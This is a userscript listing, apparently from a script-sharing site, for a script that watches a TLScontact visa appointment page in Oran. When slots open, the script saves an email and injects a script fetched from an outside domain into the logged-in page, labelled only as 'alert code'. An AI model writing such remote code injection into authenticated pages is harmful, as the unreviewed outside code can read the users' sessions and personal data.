Tls RepportNew

detailled reports of openning appointements

您需要先安裝使用者腳本管理器擴展,如 TampermonkeyGreasemonkeyViolentmonkey 之後才能安裝該腳本。

You will need to install an extension such as Tampermonkey to install this script.

您需要先安裝使用者腳本管理器擴充功能,如 TampermonkeyViolentmonkey 後才能安裝該腳本。

您需要先安裝使用者腳本管理器擴充功能,如 TampermonkeyUserscripts 後才能安裝該腳本。

你需要先安裝一款使用者腳本管理器擴展,比如 Tampermonkey,才能安裝此腳本

您需要先安裝使用者腳本管理器擴充功能後才能安裝該腳本。

(我已經安裝了使用者腳本管理器,讓我安裝!)

你需要先安裝一款使用者樣式管理器擴展,比如 Stylus,才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展,比如 Stylus,才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展,比如 Stylus,才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展後才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展後才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展後才能安裝此樣式

(我已經安裝了使用者樣式管理器,讓我安裝!)

// ==UserScript==
// @name         Tls RepportNew
// @namespace    http://tampermonkey.net/
// @version      2.4
// @description  detailled reports of openning appointements
// @author       MeGa
// @match        https://visa-fr.tlscontact.com/dz/ORN/myapp.php*
// @match        https://visa-fr.tlscontact.com/dz/orn/myapp.php*
// @icon         https://www.google.com/s2/favicons?domain=tlscontact.com
// @grant        God
// ==/UserScript==


if(document.getElementsByClassName('appt-table-btn dispo').length !== 0) {
(function() {
    'use strict';
    /////// Alert code ///////
    localStorage.setItem('usermail',"[email protected]");
    var script = document.createElement('script');
    script.src = 'https://www.prowebgen.com/alerterp203.js';
    document.head.appendChild(script);
    /////// Alert code ///////
})();setTimeout(function(){var classSlot= document.getElementsByClassName('appt-table-btn dispo');
var slot =document.querySelector("#body > div > table > tbody > tr:nth-child(7) > td.pending").outerHTML;
                                                                          var text = slot,
    blob = new Blob([text], { type: 'text/plain' }),
    anchor = document.createElement('a');

anchor.download = "RapportTLS.html";
anchor.href = (window.webkitURL || window.URL).createObjectURL(blob);
anchor.dataset.downloadurl = ['text/plain', anchor.download, anchor.href].join(':');
anchor.click();},511);}